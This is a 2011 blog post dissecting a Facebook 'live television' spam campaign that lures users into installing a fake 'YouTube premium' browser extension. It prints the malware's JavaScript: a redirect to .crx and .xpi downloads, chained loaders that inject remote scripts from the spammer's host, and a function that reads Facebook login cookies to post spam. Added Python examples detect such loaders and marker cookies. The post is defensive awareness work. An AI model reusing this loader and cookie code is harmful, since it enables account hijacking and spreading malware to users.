Tuesday, December 13, 2011

"It Happens on Live television" Facebook spam demystified - A completely new form of Spam



Hello friends. I love Facebook spams. The reason is that in them you will find the best use of JavaScript, Flash, Facebook plugins and of course social engineering. There is always so much to learn. The last Facebook spam which we looked at here in HackingAlert was the "How can Rehanna Do this" Facebook spam.

It was a browser vulnerability which was floating around for some days. Fortunately only Chrome and Safari were affected by that attack and it has been fixed now. Companies try real hard to fix all holes. But ultimately the security lies with you.

The recent spam is clearly the best spam that has ever flooded the social platform. It has been crafted very nicely and trickily. Let's demystify the spam and dig deeper into how its creators built yet another headache for Facebook. This time the targets have been Firefox and Chrome users.

As usual, once you click on the malicious link you will be asked to share it with your friends before you can watch. Here lies the first trap. Once you share it, you are pushed out of the platform to a blogspot link where you will be asked to download a plugin before you can watch the video. Even the plugin has been named "youtube premium plugin" (hats off to whoever thought of this name :-) ). Look at the picture below. There are 3 things to notice in it.


Once you share this link on your profile, you will be redirected to a link outside the platform. Once the spammer or hacker succeeds in dragging you out of the platform, the real fun begins for him.
So the first thing to notice is the blogspot link, which surely does not belong to Facebook. The next thing to notice is the error message. This error message is a fake one. In fact the entire "Flash error" looks like an error, but it is only an image and some text. The black background that you see is a simple HTML canvas, the red smiley face that you see is an image, and the link "install plugin" is a simple hyperlink created with HTML. Look at the neatness with which the spammer has used plain HTML to look like a missing-plugin error.
Now coming to the 3rd thing. Look at the image in the third part and notice the text written on its right-hand side. Do you see any relation? A girl showing something (which you might be dying to see) and the text says "Premium property-B'lore". Obviously the property is premium in the image as well.
Actually the image has got nothing to do with the text. The text is a simple advertisement and the spammer has neatly added a video thumbnail so as to make it appear as the link to this video. Once you click that link, obviously you will not see the premium property you wanted to, and in turn the spammer makes pocket money through ad clicks.
There is one more thing to look at (this one is real fun!). Look at the image.

Just below the advertisement, you will find the Facebook social plugin for adding comments. Well, it's a fake plugin simply built with HTML. Even the comments tell you that in order to view this video you will have to share it first. This is social engineering at its best.

Now moving ahead with the spam. What happens when you click the link "install plugin"?

The first thing that happens is that a hidden JavaScript executes and checks your browser type. It checks whether you are using Chrome or Firefox so that it can redirect you to the respective link to download the extension.
If you are using Chrome then you will be redirected to http://betterfinace.com/youtube.crx and if you are using Firefox then you will be redirected to http://betterfinace.com/youtube.xpi . .crx is the file extension for Chrome extensions and .xpi for Firefox extensions.
Here is the JavaScript which performs this task:


var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;

function instalar() {
    if (is_chrome) {
        // Chrome: just open the .crx so the browser offers to install it
        window.open("http://betterfinace.com/youtube.crx");
    }
    else if (is_firefox) {
        // Firefox: build the parameter object for an add-on install prompt
        var params = {
            "Youtube Extension": {
                URL: "http://betterfinace.com/youtube.xpi",
                toString: function () { return this.URL; }
            }
        };
        // the rest of the Firefox branch is cut off in the original post
    }
}


The download for the plugin will start after your browser type has been found. Here I am using Firefox as an example.
Firefox will prompt you for the download along with a warning that it is an untrusted plugin.




But how can we let go of a premium youtube plugin? So we will install it. Now, in order to check what this plugin is actually meant for, we will have to decode the .xpi file. If you open the .xpi in a text editor you will find lots of "PK" and "JSPK" text, which means that it is simply a compressed (ZIP) file. So rename it to .zip or .rar and then decompress it to view the contents of the file.
I found the following JavaScripts in the file.
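To check the "it is just a ZIP" claim and to pick out the script that pulls in remote code without unpacking anything by hand, here is an added Python example (not code from the post or from the spam itself). It builds a small stand-in .xpi in memory using the three file names mentioned in this post and the youtube.js loader shown further down, verifies the PK signature, lists the scripts and flags any that create a script element pointing at an http URL. The chrome/content/ paths and the contents of prefman.js and script-compiler.js are assumptions; the post does not show the archive layout.

```python
import io
import re
import zipfile

# Constructed sample: an in-memory .xpi mimicking the layout described in the
# post. The youtube.js body is the loader quoted in the post; the other two
# files are benign stubs standing in for prefman.js and script-compiler.js.
SAMPLE_FILES = {
    "install.rdf": "<RDF/>",
    "chrome/content/prefman.js": "var prefs = {};\n",
    "chrome/content/script-compiler.js": "function compile(src) { return src; }\n",
    "chrome/content/youtube.js": (
        "loadScript_you();\n"
        "function loadScript_you() {\n"
        "if ('https:' == document.location.protocol) return false;\n"
        "var s = document.createElement('script');\n"
        "s.setAttribute(\"type\",\"text/javascript\");\n"
        "s.setAttribute(\"src\", \"http://betterfinace.com/script.js\");\n"
        "var head=document.getElementsByTagName(\"head\")[0];\n"
        "if( head==null) return false;\n"
        "head.appendChild(s);\n"
        "return true;\n"
        "}\n"
    ),
}

# Local file header signature of a ZIP entry: the "PK" the post talks about.
ZIP_MAGIC = b"PK\x03\x04"

# A remote loader creates a <script> element and points its src at an http(s) URL.
CREATE_SCRIPT = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")
REMOTE_SRC = re.compile(r"['\"]src['\"]\s*,\s*['\"](https?://[^'\"]+)['\"]")


def build_sample_xpi() -> bytes:
    """Pack the constructed files into a ZIP, which is all an .xpi is."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in SAMPLE_FILES.items():
            zf.writestr(name, body)
    return buf.getvalue()


def is_zip(data: bytes) -> bool:
    """True when the blob starts with a ZIP local file header."""
    return data[:4] == ZIP_MAGIC


def list_scripts(data: bytes) -> list:
    """Names of all .js members, read without extracting anything to disk."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return sorted(n for n in zf.namelist() if n.lower().endswith(".js"))


def find_remote_loaders(data: bytes) -> dict:
    """Map each .js member that injects a remote script to the URLs it loads."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".js"):
                continue
            src = zf.read(name).decode("utf-8", errors="replace")
            if CREATE_SCRIPT.search(src):
                urls = REMOTE_SRC.findall(src)
                if urls:
                    hits[name] = urls
    return hits


if __name__ == "__main__":
    xpi = build_sample_xpi()
    print("ZIP container:", is_zip(xpi))
    print("scripts:", list_scripts(xpi))
    for name, urls in find_remote_loaders(xpi).items():
        print(f"{name} loads remote code from: {', '.join(urls)}")
```

For a real sample, read the .xpi bytes from disk instead of calling build_sample_xpi(); the rest of the checks are unchanged. The remote-loader regex is deliberately narrow (a literal src attribute with a full URL), so obfuscated loaders still need a manual read.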


The presence of so many JavaScripts is enough to identify what this plugin is all about. Basically these scripts contain a lot of things. This spam has been designed to attack the user in every possible way. It adds malware, steals Facebook cookies from the victim's system, adds a JS trojan and what not. Let us dig into each of them.
prefman.js and script-compiler.js are required scripts for building Firefox plugins. The only script to look at is youtube.js. It contains the hidden secret of this plugin. Have a look at the code:


loadScript_you();
function loadScript_you() {
    // do nothing at all on https pages
    if ('https:' == document.location.protocol) return false;
    // build a <script> tag pointing at the spammer's server
    var s = document.createElement('script');
    s.setAttribute("type", "text/javascript");
    s.setAttribute("src", "http://betterfinace.com/script.js");
    // inject it into the page head so the browser fetches and runs it
    var head = document.getElementsByTagName("head")[0];
    if (head == null) return false;
    head.appendChild(s);
    return true;
}


The first thing: if you are browsing over HTTPS then you are safe, because the function returns before the script element is even created. On plain HTTP it appends a script tag to the page head whose src is http://betterfinace.com/script.js, so the browser fetches and runs that remote file as soon as it parses the page. Now the question is what this external script does.
Let's visit the link to analyse the script more deeply.


function addScript() {
    var s = document.createElement('script');
    s.setAttribute("type", "text/javascript");
    s.setAttribute("src", "http://betterfinace.com/extra.js");
    // this time the new tag is hung off the first <script> element instead of <head>
    var a = document.getElementsByTagName('script')[0];
    if (a == null) return false;
    a.appendChild(s);
    return true;
}
addScript();


You will notice a similar script again. Well, the reason for chaining links like this is not clear to me. Maybe there is something I am missing. So this script also contains a link to yet another external JavaScript, which will be appended to the page when the browser parses it. Let us see what is hidden at this link.
Well, this is the script which holds all the secrets. I am still looking at this script in depth. Some of the functions which were easy to catch were:

function fb_comparte() : this function is responsible for generating the random fake plugin comments which we saw above.

function readCookie(a) : god damn! a cookie stealer for any link you visit.

function setCookie(nombre, valor, caducidad) : randomly adds cookies to track your internet activities.

function FBFBFB321() : Facebook cookie stealer (not again). Here is the snippet.


function FBFBFB321() {
    // only runs on facebook.com pages loaded over plain http
    if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
        // the extension's own marker cookie: already done on this browser
        var cook = readCookie("fb_videoazs");
        if (cook == "activo") {
            return false;
        }
        // c_user is Facebook's logged-in user id cookie; bail if not logged in
        var user_id = readCookie('c_user');
        if (user_id == null) return false;
        // per-account marker so the same account is not hit twice
        cook = readCookie("fb_videobzs_" + user_id);
        if (cook == "activo") {
            return false;
        }
        // after 2 seconds, post the fake "share" comments
        setTimeout(function () {
            fb_comparte();
        }, 2000);
        return true;
    }
    return false;
}
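As an added Python example (not part of the post or of the spam's code), here is the same guard logic written out so the conditions under which FBFBFB321() goes on to call fb_comparte() are explicit, together with a small check a defender can run over a captured Cookie header for facebook.com to spot the extension's own marker cookies. The cookie names (c_user, fb_videoazs, fb_videobzs_<id>) and the URL pattern come from the snippet above; the cookie values and user ids are constructed.

```python
import re
from http.cookies import SimpleCookie

# Same test as the JS: facebook.com over plain http only.
FB_HTTP = re.compile(r"^http://(www\.)?facebook\.com", re.IGNORECASE)


def parse_cookies(header: str) -> dict:
    """Turn a raw Cookie header into {name: value}, like readCookie() does."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def would_post(url: str, cookie_header: str) -> bool:
    """Would FBFBFB321() schedule fb_comparte() on this page with these cookies?"""
    cookies = parse_cookies(cookie_header)
    if not FB_HTTP.match(url):
        return False  # https or a non-Facebook page: the function bails out
    if cookies.get("fb_videoazs") == "activo":
        return False  # global "already done" marker
    user_id = cookies.get("c_user")
    if user_id is None:
        return False  # not logged in, so nothing to post as
    if cookies.get("fb_videobzs_" + user_id) == "activo":
        return False  # per-account marker
    return True  # fb_comparte() would run two seconds later


def infection_markers(cookie_header: str) -> list:
    """Cookie names on facebook.com that only this extension sets."""
    cookies = parse_cookies(cookie_header)
    return sorted(
        name for name in cookies
        if name == "fb_videoazs" or name.startswith("fb_videobzs_")
    )


if __name__ == "__main__":
    # Constructed cookie headers for a logged-in account with id 100001.
    clean = "c_user=100001; datr=xyz"
    marked = "c_user=100001; datr=xyz; fb_videobzs_100001=activo"
    print("http, clean  :", would_post("http://www.facebook.com/home.php", clean))
    print("https, clean :", would_post("https://www.facebook.com/home.php", clean))
    print("http, marked :", would_post("http://www.facebook.com/home.php", marked))
    print("markers found:", infection_markers(marked))
```

The marker cookies are the easiest indicator to check after the fact: a browser that has fb_videoazs or any fb_videobzs_ cookie for facebook.com ran this code at some point, even if the extension has since been removed.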


There are some other scripts too, but I am too tired now so I want to end this post.
Time and again Facebook has been hit by such spams. We need to be aware of what we do on Facebook. Think before you click, before you share.
The spam is still active on the internet, so you can go ahead and do your own research. Facebook spams are a great tool to learn from. You really get to know the tricks used by hackers and spammers to make you their prey. Hope you enjoyed my efforts. Time to watch some premium property ;-) .
Do add your comments and suggestions.


DARKLORD!!


24 comments:

  1. nice blog nice article.. greeting from indonesia :)

  2. @abhinav sing

    Thanks for the info !!

    I also read your paper on AV bypassing techniques Was really cool Hats off to u >>>>>>>>>

  3. really enjoyed this post...lol
    Hats off to these spammers for their intelligence
    N hats off to u for such deep analysis, btw I have a question: if I want to analyse some suspicious link like this one then how should I do it? Do u use a virtual machine for such purpose?
  4. @PRAMOD : thanks pramod....spammers are indeed smart..If you want to analyse suspicious links then there are two ways...use a virtual machine (and a fake fb account as well)...the second thing you can do is to open the malicious link in another browser. Suppose you are using Chrome for normal activities and all of a sudden you come across a malicious link, then copy the link and open it in Firefox and see what it does..make sure your anti virus is working so that it can block any suspicious activity.
  5. I think I had shared that link on my Facebook account. Please anyone help how to cure that, and I even had tried to download that missing divx application..................
  6. @sumit : disable the plugin by going to plugin settings in your browser..In case you have shared it on your wall then nothing more can be done other than deleting it manually..Facebook will remove it automatically for you once they identify this spam (i think they must have removed it by now)..
  7. but what about my other cookies and browser history, present and past, on my Chrome and Firefox browser? Can these spammers see those cookies or my important urls,, please anyone answer this question...
  8. @sumit : once you disable the plugin it won't be able to track you any further...but if you have opened any of your personal accounts while this plugin was active then it is highly recommended that you change the passwords of those accounts...This plugin is browser specific..if it is installed in your Chrome browser then it can monitor only your Chrome activities..
  9. @Abhinav : if i disable that application then later they can't keep track on my browser or Facebook account. thanks for such information, i will share this post to all of my frnds.
  10. Once you disable it, it won't be able to track your cookies..I have analysed the code so I am sure about it...please share this post on your facebook and social networks to help spread awareness.. :)
  11. Thank You Very Much Abhinav, Nice Articles and good information, thanks 4 helping me out, please always keep updating like this so people can come to know about these spams and these hackers. anyways ABHINAV could u please let me know, if someone hacks my personal account like gmail or facebook then how to find whether it's hacked and someone is keeping track on me...

    Thank You @Abhinav....
  12. In facebook you can go to Account settings > Security .. there you can find your recent logged-in activities..If there is some activity which you believe is not yours then you can change the account password and other information...Similarly you can check for gmail as well..Login to gmail and go to the bottom of the inbox page..there you will find a link called "last account activity - Details"..Click on details to see your recent logged-in activities...if you find any suspicious activities then it means someone else has logged into your account as well..It is highly recommended that you shift to 2 level security in gmail..
  13. Gotcha thanx...i guess the reason for switching browser is to avoid cookies stealing isn't it

  14. my frnd deleted the youtube extension from addons bt still it's posting the virus, will it be okiii after restarting?
  15. yes..it won't work once you have removed the plugin
  16. there is no such plugin in my browser.... but i am still facing this problem....